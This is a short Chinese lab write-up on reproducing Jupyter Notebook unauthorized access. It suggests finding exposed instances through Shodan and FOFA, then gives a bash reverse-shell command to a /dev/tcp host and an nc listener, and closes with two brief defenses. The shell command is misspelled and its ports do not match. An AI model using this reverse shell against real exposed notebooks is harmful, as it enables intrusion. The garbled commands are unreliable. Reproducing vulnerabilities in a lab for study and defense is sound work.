漏洞复现----25、Jupyter Notebook 未授权访问漏洞

---

Jupyter Notebook 未授权访问漏洞

Jupyter Notebook（此前被称为 IPython notebook）是基于网页的用于交互计算的应用程序，是一个交互式笔记本，支持运行 40 多种编程语言。Jupyter Notebook是以网页的形式打开，可以在网页页面中直接编写代码和运行代码，代码的运行结果也会直接在代码块下显示。

如果管理员未为Jupyter Notebook配置密码，将导致未授权访问漏洞，游客可在其中创建一个console并执行任意Python代码和命令。

一、运行环境

docker-compose up -d
访问：ip:8888

二、漏洞复现

在shadan和FOFA等网络空间搜索引擎中搜索，可发现大量使用Jupyter Notebook的系统。

1、直接访问http://192.168.209.138:8888，并没有进行身份校验，未授权可以直接访问。
2、利用Terminal可以直接执行系统命令


3、

在命令行执行：bahs -i > &/dev/tcp/192.168.209.128/44444 0>&1。
监听机器执行：nc -lvvp 4444

三、漏洞防御

1、开启身份验证, 防止止未经授权用用户访问
2、访问控制策略略, 限制IP访问, 绑定固定IP